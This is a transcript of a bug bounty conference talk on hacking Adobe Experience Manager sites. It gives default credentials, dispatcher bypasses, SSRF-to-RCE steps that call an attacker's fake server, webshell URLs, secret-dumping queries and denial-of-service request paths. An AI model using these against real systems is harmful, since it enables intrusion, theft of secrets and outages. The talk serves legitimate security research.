Upgrade to Pro — share decks privately, control downloads, hide ads and more …

AEM hacker approaching Adobe Experience Manager...

AEM hacker approaching Adobe Experience Manager webapps in bug bounty programs

Adobe Experience Manager (AEM) is an enterprise-grade CMS and is quite popular among high-profile companies. There are many bug bounty programs with AEM included in the scope. In the talk, the author shares unique methodology on how to approach AEM weabpps in bug bounty programs.

Mikhail Egorov

January 19, 2019
Tweet

More Decks by Mikhail Egorov

Other Decks in Programming

Transcript

  1. Mikhail Egorov • Whitehat, security researcher, bug hunter, conference speaker

    • Bugcrowd – https://www.bugcrowd.com/0ang3el • H1 – https://www.hackerone.com/0ang3el • Twitter - @0ang3el • GitHub - https://github.com/0ang3el • Slideshare - https://www.slideshare.net/0ang3el • Speakerdeck - https://speakerdeck.com/0ang3el • LinkedIn - https://www.linkedin.com/in/0ang3el 2/124
  2. Why this talk? • A lot of AEM targets are

    in scope of BBP or VPD • AEM webapps are usually insecure • Security misconfigurations (AEM is complex) • Not installed security updates • Attract attention to AEM webapps insecurity • Motivate bug hunters to test AEM webapps 3/124
  3. Topics to discuss • Methodology w/ bug examples • Automation

    • AEM Hacker Toolset – https://github.com/0ang3el/aem-hacker.git • AEM RCE bundle – https://github.com/0ang3el/aem-rce-bundle.git • Only known vulnerabilities and techniques are discussed!!! 4/124
  4. Personal achievements in 2018 • Reported 84 non-duplicate bugs on

    Bugcrowd and H1 for AEM targets • P1s – 38 issues • P2s – 37 issues • P3s – 7 issues • P4s – 2 issue • Got 2 CVEs from Adobe PSIRT 7/124
  5. Personal achievements in 2018 • P1s • RCE • Secrets

    disclosure (passwords, tokens) • P2s • Internal SSRF, High impact • Stored XSS • Application-level DoS, Easy Difficulty • P3s • Internal SSRF, Medium impact • Reflected XSS • Application-level DoS, Medium Difficulty • P4s • Reflected XSS, Flash-based 8/124
  6. Previous works 2015 - https://www.slideshare.net/0ang3el/hacking-aem-sites 2016 - http://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com- Remote-Code-Execution-Write-Up.html 2018

    - https://speakerdeck.com/fransrosen/a-story-of-the-passive- aggressive-sysadmin-of-aem 2018 - https://medium.com/@jonathanbouman/reflected-xss-at-philips-com- e48bf8f9cd3c 2018 - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem- webapps 9/124
  7. AEM architecture • Based on open source projects • Apache

    Felix • Apache Sling • Apache OAK JCR https://helpx.adobe.com/experience-manager/using/osgi_getting_started.html 11/124
  8. Common AEM deployment Main blocks: • Author AEM instance •

    Publish AEM instance • AEM dispatcher (~WAF) Interacts with Publish server via AEM Dispatcher! 4503/tcp 4502/tcp 443/tcp ? 12/124
  9. AEM dispatcher • In theory … a front end system

    offers an extra layer of security to your Adobe Experience Manager infrastructure • Often in practice … it’s the only security layer!!! • Admins rarely keep all components on Publish instance updated and securely configured! • Dispatcher bypasses allow to talk to those “insecure” components on Publish instance 13/124
  10. Using CVE-2016-0957 /filter { # Deny everything first and then

    allow specific entries /0001 { /type "deny" /glob "*" } /0023 { /type "allow" /url "/content*" } # disable this rule to allow mapped content only /0041 { /type "allow" /url "*.css" } # enable css /0042 { /type "allow" /url "*.gif" } # enable gifs /0043 { /type "allow" /url "*.ico" } # enable icos /0044 { /type "allow" /url "*.js" } # enable javascript /0045 { /type "allow" /url "*.png" } # enable png /0046 { /type "allow" /url "*.swf" } # enable flash /0047 { /type "allow" /url "*.jpg" } # enable jpg /0048 { /type "allow" /url "*.jpeg" } # enable jpeg /0062 { /type "allow" /url "/libs/cq/personalization/*" } # enable personalization Policy dispatcher.any before CVE-2016-0957 15/124
  11. Using CVE-2016-0957 # Deny content grabbing /0081 { /type "deny"

    /url "*.infinity.json" } /0082 { /type "deny" /url "*.tidy.json" } /0083 { /type "deny" /url "*.sysview.xml" } /0084 { /type "deny" /url "*.docview.json" } /0085 { /type "deny" /url "*.docview.xml" } /0086 { /type "deny" /url "*.*[0-9].json" } # Deny query (and additional selectors) /0090 { /type "deny" /url "*.query*.json" } } Policy dispatcher.any before CVE-2016-0957 16/124
  12. Bypasses for “interesting” servlets Policy dispatcher.any after CVE-2016-0957 /filter {

    # Deny everything first and then allow specific entries /0001 { /type "deny" /glob "*" } # Allow non-public content directories /0023 { /type "allow" /url "/content*" } # disable this rule to allow mapped content only # Enable extensions in non-public content directories, using a regular expression /0041 { /type "allow" /extension '(clientlibs|css|gif|ico|js|png|swf|jpe?g|woff2?)’ } 18/124
  13. Bypasses for “interesting” servlets Policy dispatcher.any after CVE-2016-0957 # Enable

    features /0062 { /type "allow" /url "/libs/cq/personalization/*" } # enable personalization # Deny content grabbing, on all accessible pages, using regular expressions /0081 { /type "deny" /selectors '((sys|doc)view|query|[0-9-]+)’ /extension '(json|xml)’ } 19/124
  14. Bypasses for “interesting” servlets Policy dispatcher.any after CVE-2016-0957 # Deny

    content grabbing for /content /0082 { /type "deny" /path "/content" /selectors '(feed|rss|pages|languages|blueprint|infinity|tidy)’ /extension '(json|xml|html)’ } } 20/124
  15. Using SSRF • We need SSRF in a component that

    is allowed by AEM dispatcher policy • SSRF should allow to send GET request and see response • Opensocial (Shindig) proxy • SSRF in ReportingServicesProxyServlet (CVE-2018-12809) 23/124
  16. AEM RCE bundle • AEM RCE bundle – https://github.com/0ang3el/aem-rce-bundle.git •

    Has pre-build OSGI bundle for AEM 6.2 or newer • Allows to get RCE when you have access to Felix Console • Happens when you guessed admin credentials 25/124
  17. AEM RCE bundle, build yourself mvn org.apache.maven.plugins:maven-archetype-plugin:2.4:generate \ -DarchetypeGroupId=com.adobe.granite.archetypes \

    -DarchetypeArtifactId=aem-project-archetype \ -DarchetypeVersion=11 \ -DarchetypeCatalog=https://repo.adobe.com/nexus/content/groups/public/ mvn org.apache.maven.plugins:maven-archetype-plugin:2.4:generate \ -DarchetypeGroupId=com.day.jcr.vault \ -DarchetypeArtifactId=multimodule-content-package-archetype \ -DarchetypeVersion=1.0.2 \ -DarchetypeCatalog=https://repo.adobe.com/nexus/content/groups/public/ For AEM 6.0 or newer For AEM 5.6 26/124
  18. AEM hacker toolset • Toolset – https://github.com/0ang3el/aem-hacker.git • Includes scripts

    • aem_hacker.py • aem_discoverer.py • aem_enum.py • aem_ssrf2rce.py, aem_server.py, response.bin • aem-rce-sling-script.sh 28/124
  19. aem_hacker.py • Main tool – scans AEM webapp for misconfigurations

    and vulnerabilities • Tries to bypass AEM dispatcher • You need to run it from VPS to detect SSRFs! • You need to do extra manual work to detect if findings are exploitable 29/124
  20. aem_hacker.py python3 aem_hacker.py -h usage: aem_hacker.py [-h] [-u URL] [--proxy

    PROXY] [--debug] [--host HOST] [--port PORT] [--workers WORKERS] AEM hacker by @0ang3el, see the slides - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps optional arguments: -h, --help show this help message and exit -u URL, --url URL url to scan --proxy PROXY http and https proxy --debug debug output --host HOST hostname or IP to use for back connections during SSRF detection --port PORT opens port for SSRF detection --workers WORKERS number of parallel workers 30/124
  21. aem_hacker.py – checks 1/3 • Exposed DefaultGetServlet • Exposed QueryBulderJsonServlet

    and QueryBuilderFeedServlet • Exposed GQLServlet • Exposed POSTServlet • Exposed LoginStatusServlet • Users with default password • Exposed Felix Console • Enabled WCMDebugFilter 32/124
  22. aem_hacker.py – checks 2/3 • Exposed WCMSuggestionsServlet • Exposed AuditlogServlet

    • Exposed CRXDE logs • Exposed CRXDE and CRX • SSRF SalesforceSecretServlet • SSRF ReportingServicesServlet • SSRF SitecatalystServlet • SSRF AutoprovisioningServlet 33/124
  23. aem_hacker.py – checks 3/3 • SSRF OpensocialProxy • SWF XSSes

    • Deser ExternalJobServlet • Exposed Webdav • Exposed Groovy Console • Exposed ACS AEM Tools 34/124
  24. aem_discoverer.py • Allows to scan urls and find AEM webapps

    among them • Tries to bypass AEM dispatcher • Common usage python3 aem_discoverer.py --file urls.txt --workers 150 35/124
  25. aem_discoverer.py python3 aem_discoverer.py -h usage: aem_discoverer.py [-h] [--file FILE] [--proxy

    PROXY] [--debug] [--workers WORKERS] AEM discoverer by @0ang3el, see the slides - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps optional arguments: -h, --help show this help message and exit --file FILE file with urls --proxy PROXY http and https proxy --debug debug output --workers WORKERS number of parallel workers 36/124
  26. aem_enum.py python3 aem_enum.py -h usage: aem_enum.py [-h] [--url URL] [--base

    BASE] [--grabdepth GRABDEPTH] [--maxdepth MAXDEPTH] [--workers WORKERS] [--out OUT] [--proxy PROXY] [--debug] AEM exploration tool by @0ang3el (grabs users and secrets), see the slides - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps optional arguments: -h, --help show this help message and exit --url URL AEM webapp URL, required parameter --base BASE set base node (/etc or /apps or /home or /var), if not set, base node is selected automatically --grabdepth GRABDEPTH JCR subtree depth on each iteration, 2 should be a safe value for all nodes --maxdepth MAXDEPTH maximum depth for JCR search, increase it to find more --workers WORKERS number of parallel workers --out OUT CSV file with results, delimiter symbol is | --proxy PROXY http and https proxy --debug debug output 38/124
  27. aem_enum.py • Common usage • Change start node python3 aem_enum.py

    --url https://aem.webapp python3 aem_enum.py --url https://aem.webapp --base /etc 39/124
  28. aem_ssrf2rce.py & aem_server.py • aem_ssrf2rce.py & aem_server.py + response.bin •

    Helps to exploit SSRF in SitecatalystServlet or AutoprovisioningServlet as RCE • It should work on AEM before AEM-6.2-SP1-CFP7 running on Jetty • Exploits reverse replication to get RCE after joining topology using SSRF 40/124
  29. aem_ssrf2rce.py python3 aem_ssrf2rce.py -h usage: aem_ssrf2rce.py [-h] [--url URL] [--fakeaem

    FAKEAEM] [--proxy PROXY] optional arguments: -h, --help show this help message and exit --url URL URL for SitecatalystServlet or AutoprovisioningServlet, including path, without query part --fakeaem FAKEAEM hostname/ip of fake AEM server --proxy PROXY http and https proxy 41/124
  30. aem_ssrf2rce.py & aem_server.py • Place aem_server.py and response.bin on your

    VPS • Run aem_server.py script python3 aem_server.py starting fake AEM server... running server... 42/124
  31. aem_ssrf2rce.py & aem_server.py • Run aem_ssrf2rce.py script python3 aem_ssrf2rce.py --url

    https://aem.webapp/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet --fakeaem your_vps_hostname_ip 43/124
  32. aem_ssrf2rce.py & aem_server.py • If RCE is possible, you should

    see incoming connection to your fake AEM server • Shell is accessible from https://aem.webapp/rcenode.html?Vgu9BKV9zdvJNByNh9NB=ls 44/124
  33. aem-rce-sling-script.sh • Allows to get RCE when Felix Console is

    not available, but you have permissions to create new nodes under /apps JCR node • Usage • Shell is available at https://aem.webapp/rcenode.html?cmd=ls ./aem-rce-sling-script.sh https://aem.webapp username password 45/124
  34. RCE via ACS AEM Tools • Exposes Fiddle with ability

    to execute JSP scripts at • • May or may not require authentication 52/124
  35. What can you do w/ valid creds? • RCE •

    Deface site – create/modify/delete content • Persistent XSS 55/124
  36. How to get valid creds? • Default credentials • admin:admin

    • author:author • Bruteforce creds • properties , , , etc. contain usernames • automates usernames grabbing • AEM supports basic authorization 56/124
  37. RCE via credentials of privileged user Felix Console Sling Scripting

    admin:admin SlingPOSTServlet Other /system/console/bundles /apps WebDAV 57/124
  38. RCE via credentials of privileged user Felix Console Sling Scripting

    admin:admin SlingPOSTServlet Other /system/console/bundles /apps Upload AEM RCE OSGI bundle WebDAV https://github.com/0ang3el/aem-rce-bundle.git 58/124
  39. RCE via credentials of privileged user Felix Console Sling Scripting

    admin:admin SlingPOSTServlet Other /system/console/bundles /apps Upload JSP script to /apps WebDAV https://sling.apache.org/documentation/getting-started/discover-sling-in-15-minutes.html aem-rce-sling-script.sh 61/124
  40. RCE via credentials of privileged user Felix Console Sling Scripting

    admin:admin SlingPOSTServlet Other /system/console/bundles /apps Upload JSP script to /apps WebDAV cadaver https://aem.webapp/crx/repository/crx.default https://sling.apache.org/documentation/getting-started/discover-sling-in-15-minutes.html 62/124
  41. Author user author:author SlingPOSTServlet WebDAV Create, modify, delete any node

    in /content Other CRXDE Lite https://sling.apache.org/documentation/bundles/manipulating-content-the-slingpostservlet-servlets-post.html 64/124
  42. Author user author:author SlingPOSTServlet WebDAV Create, modify, delete any node

    in /content Other CRXDE Lite cadaver https://aem.webapp/crx/repository/crx.default 65/124
  43. Author user author:author SlingPOSTServlet WebDAV Create, modify, delete any node

    in /content Other CRXDE Lite https://aem.webapp/crx/de/index.jsp 66/124
  44. Non-privileged user SlingPOSTServlet WebDAV Find node with weak ACL Other

    CRXDE Lite hasPermission predicate of Querybuilder 67/124
  45. Non-privileged user SlingPOSTServlet WebDAV Find node with weak ACL Other

    CRXDE Lite hasPermission predicate of Querybuilder https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html#hasPermission 68/124
  46. Anonymous user SlingPOSTServlet WebDAV Find node with weak ACL Other

    CRXDE Lite /content/usergenerated /content/usergenerated/etc/commerce/smartlists hasPermission predicate of Querybuilder Anonymous usually has jcr:write permission for node Anonymous usually has jcr:addChildNode permission for node 69/124
  47. Tricks to get persistent XSS • SVG in property value

    • create property with SVG content • add /a.svg to the URL • HTML in property value • create property with HTML content and name aaa.html • jcr:data and jcr:mimeType (upload file) • Other 70/124
  48. Extracting secrets from JCR • Everything is stored in JCR

    repository as node properties including: • Secrets (passwords, encryption keys, tokens) • Configuration • PII • Usernames 79/124
  49. Why is it possible? • ACL is misconfigured for a

    JCR node, storing secrets • Admins rely on AEM dispatcher protection 80/124
  50. DefaultGetServlet • Allows to get JCR node with its props

    • Selectors • tidy • infinity • numeric value: -1, 0, 1 … 99999 • Formats • json • xml • res 82/124
  51. DefaultGetServlet https://aem.site/.tidy.3.json jcr:root selector tidy selector depth output format Get

    JCR nodes with props starting from jcr:root with depth 3 and return formatted JSON 83/124
  52. DefaultGetServlet - How to grab • Get node names, start

    from • /.1.json • /.ext.json • /.childrenlist.json • Or guess node names: • Common names - /content, /home, /var, /etc • Dump props for each child node of • /etc.json or /etc.5.json or /etc.-1.json 84/124
  53. DefaultGetServlet – What to grab • Interesting nodes • /etc

    – may contain secrets (passwords, enc. keys, …) • /apps/system/config or /apps/<smth>/config (passwords, …) • /var – may contain private information (PII) • /home – password hashes, PII • Interesting props – contain AEM users names • jcr:createdBy • jcr:lastModifiedBy • cq:LastModifiedBy 85/124
  54. QueryBuilder servlets • We can search JCR using different predicates

    • https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder- predicate-reference.html • QueryBuilderJsonServlet allows to get Nodes and their Props • /bin/querybuilder.json • QueryBuilderFeedServlet allows to get Nodes (no Props) • /bin/querybuilder.feed.servlet • we can use blind binary search for Props 88/124
  55. Examples of useful searches • type=nt:file&nodename=*.zip • path=/home&p.hits=full&p.limit=-1 • hasPermission=jcr:write&path=/content

    • hasPermission=jcr:addChildNodes&path=/content • hasPermission=jcr:modifyProperties&path=/content • p.hits=selective&p.properties=jcr%3alastModifiedBy&property=jcr%3alast ModifiedBy&property.operation=unequals&property.value=admin&type=n t%3abase&p.limit=1000 • path=/etc&path.flat=true&p.nodedepth=0 • path=/etc/replication/agents.author&p.hits=full&p.nodedepth=-1 89/124
  56. Opensocial (Shindig) proxy • SSRF via Opensocial (Shindig) proxy •

    • • Allows to send GET request to an arbitrary URL and see response • Suitable for • Ex-filtrate secrets from internal network services • Bypass AEM dispatcher and ex-filtrate secrets from JCR • Reflected XSS 95/124
  57. ReportingServicesProxyServlet • SSRF via ReportingServicesProxyServlet (CVE-2018-12809) • • • Allows

    to send GET request to an arbitrary URL and see response • Suitable for • Ex-filtrate secrets from internal network services • Bypass AEM dispatcher and ex-filtrate secrets from JCR • Reflected XSS 97/124
  58. SalesforceSecretServlet 100/124 • SSRF via SalesforceSecretServlet (CVE-2018-5006) • • Allows

    to send POST request to an arbitrary URL and see response • Suitable for • Ex-filtrate secrets from some internal network services • POST ≡ GET • Reflected XSS
  59. SiteCatalystServlet • SSRF via SiteCatalystServlet • • • Allows to

    send POST request to an arbitrary URL blindly, allows to send arbitrary headers (CRLF injection) • Suitable for • Access internal network services (hard in blackbox scenario) • RCE (requires specific AEM version and appserver) 103/124
  60. AutoProvisioningServlet • SSRF via AutoProvisioningServlet • • Allows to send

    POST request to an arbitrary URL blindly, allows to send arbitrary headers (CRLF injection) • Suitable for • Access internal network services (hard in blackbox scenario) • RCE (requires specific AEM version and appserver) 105/124
  61. SSRF >>> RCE • It’s possible to escalate SSRFs in

    SiteCatalystServlet and AutoProvisioningServlet to RCE on Publish server • Requirements • AEM 6.2 before AEM-6.2-SP1-CFP7 fix pack • Jetty appserver (default installation) 107/124
  62. ExternalJobPostServlet • Old bug, affects AEM 5.5 – 6.1 •

    http://aempodcast.com/2016/podcast/aem-podcast-java-deserialization-bug/ • • Parameter accepts Java serialized stream and passes to 110/124
  63. XXE via WebDAV • Old bug, CVE-2015-1833 • It’s possible

    to read local files with PROPFIND/PROPPATCH • https://www.slideshare.net/0ang3el/what-should-a-hacker-know-about-webdav 113/124
  64. Check WebDAV support • Send request • header in response

    contain webdav-related methods • Navigate to • 401 HTTP and WWW-Authenticate: Basic realm="Adobe CRX WebDAV" 114/124
  65. Vectors • SWF XSSes (kudos to @fransrosen) • WCMDebugFilter XSS

    – CVE-2016-7882 • See Philips XSS case @JonathanBoumanium • Many servlets return HTML tags in JSON response • SuggestionHandlerServlet (reflect parameter) 116/124
  66. DoS is easy • /.ext.infinity.json • /.ext.infinity.json?tidy=true • /bin/querybuilder.json?type=nt:base&p.limit=-1 •

    /bin/wcm/search/gql.servlet.json?query=type:base%20limit:..-1&pathPrefix= • /content.assetsearch.json?query=*&start=0&limit=10&random=123 • /..assetsearch.json?query=*&start=0&limit=10&random=123 • /system/bgservlets/test.json?cycles=999999&interval=0&flushEvery=111111111 121/124
  67. Conclusion • AEM target is a goldmine for a bug

    hunter • I hope my work will help to approach AEM targets 123/124